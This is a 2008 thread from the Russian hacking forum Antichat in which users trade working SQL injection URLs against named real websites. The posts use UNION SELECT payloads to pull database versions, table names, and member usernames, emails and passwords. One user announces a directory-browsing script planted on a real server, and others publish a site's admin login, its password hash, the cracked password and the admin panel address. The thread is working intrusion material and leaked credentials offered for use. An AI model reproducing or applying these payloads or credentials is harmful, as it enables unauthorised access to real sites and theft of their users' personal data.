ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6621  
Старый 20.09.2008, 22:48
Аватар для FAPSI
FAPSI
Banned
Регистрация: 18.09.2008
Сообщений: 23
Провел на форуме:
94916

Репутация: 5
По умолчанию

Залил скрипт - можно пошариться по серваку
http://www.geoimport.ge/uploads/dir.php?cd=./../../doc/admin
 
Ответить с цитированием

  #6622  
Старый 20.09.2008, 23:23
Аватар для mefish
mefish
Познающий
Регистрация: 13.04.2008
Сообщений: 42
Провел на форуме:
384537

Репутация: 35
Thumbs down

Цитата:
Сообщение от FAPSI  
Залил скрипт - можно пошариться по серваку
http://www.geoimport.ge/uploads/dir.php?cd=./../../doc/admin
Ща тебя пошарят немного.
Ты читал как раздел называеться ?
Тут ток скуль иньекцыи, а шелы, фтп и прочая гадость в разделе Халява
 
Ответить с цитированием

  #6623  
Старый 21.09.2008, 08:37
Аватар для 3xIm3
3xIm3
Познающий
Регистрация: 19.09.2008
Сообщений: 95
Провел на форуме:
399173

Репутация: 102
По умолчанию

_http://www.globalsmokefreepartnership.org/news.php?id=251+order+by+4/*
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4/*
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,version(),3,4/*
4.1.22
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4+from+membe rs/*

_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,username,email,p assword+from+members+limit+356,2/*
 
Ответить с цитированием

  #6624  
Старый 21.09.2008, 14:27
Аватар для -=Static=-
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573

Репутация: 185
По умолчанию

Новая социальная сеть книголюбов BookMix.ru

Предистория: Сижу както на работе днем. Делать особо нечего. Почитываю новости, и натыкаюсь на интересный заголовок "Открылась социальная сеть книголюбов BookMix.ru".
Думаю а дайка посмотрю, че за сеть то?))
Захожу, вижу новости...в строке передается id. Первая мысль - SQL-Inj. И опа...вуоля!)))) Действительно инъект. Нехитрыми манипуляциями подбираю столбцы.


PHP код:
http://bookmix.ru/news/index.phtml?id=-48+union  +select+1,2,3,4,5,  6,7,8,9,10,11/* 
USER(): bookmix@localhost
DATABASE(): bookmix
VERSION(): 5.0.22

Есть доступ до information_schema, а посему поковырял таблицы, есть 2 интересные, с полями соответсвенно:

Код:
admins
	-user_id
	-name
	-login
	-pass
Код:
users
	-user_id
	-name
	-login
	-pass
	-email
	-icq
	-skype
	-description
	-birthday
	-showage
	-sex
	-phone
	-howtohear
	-photo
	-photo_tn
	-photo_tn2
	-status
	-regdate
	-logged
	-lastvisit
	-referrer
	-privatemessagesnotification
	-friends
	-reviews
	-comments
	-online
	-regcode
	-read
	-ireadadddate

admins
Код:
1: pechatnick: pechatnick: 7ac2262d4ca6e2de63094a51225b00ee (stroka)
У кого есть желание, ковыряйте дальше))
 
Ответить с цитированием

  #6625  
Старый 21.09.2008, 14:53
Аватар для USAkid
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

-=Static=-, добил сайтег:

Код:
Админка тут - http://bookmix.ru/_admin/
pechatnick:stroka
Кстати много интересного
 
Ответить с цитированием

  #6626  
Старый 21.09.2008, 22:06
Аватар для groupby
groupby
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017

Репутация: 61
По умолчанию

Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:

http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*

все кроме цифр режется почему-то. Ни одну функцию заюзать не могу.
 
Ответить с цитированием

  #6627  
Старый 21.09.2008, 22:46
Аватар для groupby
groupby
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017

Репутация: 61
По умолчанию

Вот ещё сайтег. При возникновении ошибки SQL выдает довольно подробный отчет по ошибке
Но внутрь я залезть что-то не смог (

http://www.boreme.com/members/viewviral.php?viral_id=18891%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12/*&siteid=55336
 
Ответить с цитированием

  #6628  
Старый 22.09.2008, 00:03
Аватар для n3m0
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

Цитата:
http://tid.odessa.ua/news/?newsid=-1+union+select+version(),database(),3,user(),5/*
Цитата:
http://tid.odessa.ua//action/?action_id=-1+union+select+version(),2,3,4/*
Цитата:
Ничего интересного нету
 
Ответить с цитированием

  #6629  
Старый 22.09.2008, 00:45
Аватар для groupby
groupby
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017

Репутация: 61
По умолчанию

Вот ещё сайтик. Сразу с мемберами выложил

http://englishspectrum.net/jobkorea/findpeople.html?include=form&mode=view&id=-99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,member _id,temp_passwd,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81, 82,83,84,85,86 from english_member limit 1,1/*&lc=&sc=&mc=&pp=&gid=1&&&search_YN=Y
 
Ответить с цитированием

  #6630  
Старый 22.09.2008, 02:31
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

http://www.bestonlinevalue.com/upgrade.php?ucat=-1086/**/union/**/select/**/1,22,23,24,column_name,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55/**/from/**/information_schema.columns+where+table_name=0x7061 7970616C5F636172745F696E666F+limit+0,1--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ